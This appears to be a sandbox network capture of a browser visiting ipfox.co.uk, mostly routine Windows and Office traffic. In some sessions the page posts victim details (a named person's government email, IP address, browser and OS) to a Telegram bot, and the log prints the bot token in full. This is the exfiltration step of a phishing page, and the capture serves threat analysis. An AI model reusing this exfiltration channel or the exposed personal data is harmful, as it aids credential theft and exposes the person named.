                                              2024-10-25 13:45:12 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449757149.154.167.2204431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:12 UTC554OUTOPTIONS /bot7107686937:AAGoqXlr31lmLR7qgVo_FFgSjoOSDhGFxSU/sendMessage HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: keep-alive
                                              Accept: */*
                                              Access-Control-Request-Method: POST
                                              Access-Control-Request-Headers: content-type
                                              Origin: https://ipfox.co.uk
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Dest: empty
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC345INHTTP/1.1 204 No Content
                                              Server: nginx/1.18.0
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Connection: close
                                              Access-Control-Max-Age: 86400
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Allow-Headers: content-type
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449758104.26.13.2054431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:12 UTC349OUTGET /?format=json HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:12 UTC217INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:12 GMT
                                              Content-Type: application/json
                                              Content-Length: 23
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8d82a54f3c06e993-DFW
                                              2024-10-25 13:45:12 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 7d
                                              Data Ascii: {"ip":"173.254.250.81"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449759184.28.90.27443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:13 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                              Range: bytes=0-2147483646
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2024-10-25 13:45:13 UTC515INHTTP/1.1 200 OK
                                              ApiVersion: Distribute 1.1
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              Content-Type: application/octet-stream
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              Server: ECAcc (lpl/EF06)
                                              X-CID: 11
                                              X-Ms-ApiVersion: Distribute 1.2
                                              X-Ms-Region: prod-weu-z1
                                              Cache-Control: public, max-age=183589
                                              Date: Fri, 25 Oct 2024 13:45:13 GMT
                                              Content-Length: 55
                                              Connection: close
                                              X-CID: 2
                                              2024-10-25 13:45:13 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449762104.26.13.2054431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:13 UTC349OUTGET /?format=json HTTP/1.1
                                              Host: api.ipify.org
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:13 UTC217INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:13 GMT
                                              Content-Type: application/json
                                              Content-Length: 23
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8d82a5543822eb02-DFW
                                              2024-10-25 13:45:13 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 22 7d
                                              Data Ascii: {"ip":"173.254.250.81"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449760149.154.167.2204431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:13 UTC651OUTPOST /bot7107686937:AAGoqXlr31lmLR7qgVo_FFgSjoOSDhGFxSU/sendMessage HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: keep-alive
                                              Content-Length: 464
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-platform: "Windows"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Content-Type: application/json
                                              Accept: */*
                                              Origin: https://ipfox.co.uk
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://ipfox.co.uk/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:13 UTC464OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 36 33 33 35 39 38 39 37 37 38 22 2c 22 74 65 78 74 22 3a 22 5c 6e e2 95 ad 42 6f 74 20 44 65 74 65 63 74 69 6f 6e 20 52 65 73 75 6c 74 3a 5c 6e e2 94 a3 20 42 61 73 65 36 34 20 45 5f 64 61 74 61 3a 20 45 72 69 6b 2e 4a 6f 68 6e 73 6f 6e 40 61 67 2e 73 74 61 74 65 2e 6d 6e 2e 75 73 5c 6e e2 94 a3 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 5c 6e e2 94 a3 20 42 72 6f 77 73 65 72 3a 20 43 68 72 6f 6d 65 20 31 31 37 2e 30 2e 30 2e 30 5c 6e e2 94 a3 20 4f 53 3a 20 57 69 6e 64 6f 77 73 20 31 30 5c 6e e2 94 a3 20 44 65 76 69 63 65 3a 20 55 6e 6b 6e 6f 77 6e 20 7c 20 55 6e 6b 6e 6f 77 6e 20 7c 20 55 6e 6b 6e 6f 77 6e 5c 6e e2 94 a3 20 50 61 67 65 3a 20 2f 70 61 67 65 73 2f 74 68 61 6e 6b 73
                                              Data Ascii: {"chat_id":"6335989778","text":"\nBot Detection Result:\n Base64 E_data: Erik.Johnson@ag.state.mn.us\n IP Address: 173.254.250.81\n Browser: Chrome 117.0.0.0\n OS: Windows 10\n Device: Unknown | Unknown | Unknown\n Page: /pages/thanks
                                              2024-10-25 13:45:13 UTC373INHTTP/1.1 429 Too Many Requests
                                              Server: nginx/1.18.0
                                              Date: Fri, 25 Oct 2024 13:45:13 GMT
                                              Content-Type: application/json
                                              Content-Length: 117
                                              Connection: close
                                              Retry-After: 33845
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-10-25 13:45:13 UTC117INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 33 38 34 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 33 38 34 35 7d 7d
                                              Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 33845","parameters":{"retry_after":33845}}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.44976320.12.23.50443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=76n2YYww4aHFrFc&MD=O4CPbXYe HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                              Host: slscr.update.microsoft.com
                                              2024-10-25 13:45:19 UTC560INHTTP/1.1 200 OK
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Content-Type: application/octet-stream
                                              Expires: -1
                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                              MS-CorrelationId: 266e640e-2c10-4ecc-8c96-6ee5b543c480
                                              MS-RequestId: 1717697b-5306-445a-a66d-a0cd1db97dc3
                                              MS-CV: O7xqiaO5aUOEqFeV.0
                                              X-Microsoft-SLSClientCache: 2880
                                              Content-Disposition: attachment; filename=environment.cab
                                              X-Content-Type-Options: nosniff
                                              Date: Fri, 25 Oct 2024 13:45:18 GMT
                                              Connection: close
                                              Content-Length: 24490
                                              2024-10-25 13:45:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                              2024-10-25 13:45:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23192.168.2.44976913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:51 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:51 UTC561INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:51 GMT
                                              Content-Type: text/plain
                                              Content-Length: 218853
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public
                                              Last-Modified: Wed, 23 Oct 2024 06:30:03 GMT
                                              ETag: "0x8DCF32C20D7262E"
                                              x-ms-request-id: 39f98116-901e-0015-0fb5-25b284000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134551Z-15b8d89586fwzdd8urmg0p1ebs0000000axg000000007vqa
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:51 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                              2024-10-25 13:45:51 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                              2024-10-25 13:45:51 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                              Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                              2024-10-25 13:45:51 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                              Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                              2024-10-25 13:45:51 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                              2024-10-25 13:45:52 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                              Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                              2024-10-25 13:45:52 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                              Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                              2024-10-25 13:45:52 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                              Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                              2024-10-25 13:45:52 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                              Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
